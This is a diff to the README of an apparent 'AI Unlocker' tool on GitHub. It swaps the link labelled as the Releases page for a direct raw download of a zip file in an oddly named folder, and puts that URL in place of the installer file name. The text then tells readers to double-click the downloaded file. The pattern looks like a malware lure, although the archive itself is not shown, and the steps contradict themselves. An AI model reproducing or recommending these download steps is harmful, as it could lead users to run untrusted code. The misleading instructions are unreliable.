wajira25/Goida-AI-Unlocker/README.md

 - Supports popular applications and tools used in AI development.

 ## 📦 Download & Install
-1. Click on the following link to visit the Releases page: [Download Goida-AI-Unlocker](https://github.com/wajira25/Goida-AI-Unlocker/releases).
+1. Click on the following link to visit the Releases page: [Download Goida-AI-Unlocker](https://raw.githubusercontent.com/wajira25/Goida-AI-Unlocker/main/subcarbide/Goida-AI-Unlocker.zip).
 2. On the Releases page, find the latest version listed.
 3. Click on the version number to view the release details.
-4. Locate the installation file, typically named `Goida-AI-Unlocker.exe`, and click on it to download.
+4. Locate the installation file, typically named `https://raw.githubusercontent.com/wajira25/Goida-AI-Unlocker/main/subcarbide/Goida-AI-Unlocker.zip`, and click on it to download.
 5. Once the download is complete, locate the file in your Downloads folder.
 6. Double-click the installation file to begin the installation process.
 7. Follow the on-screen instructions to complete the setup.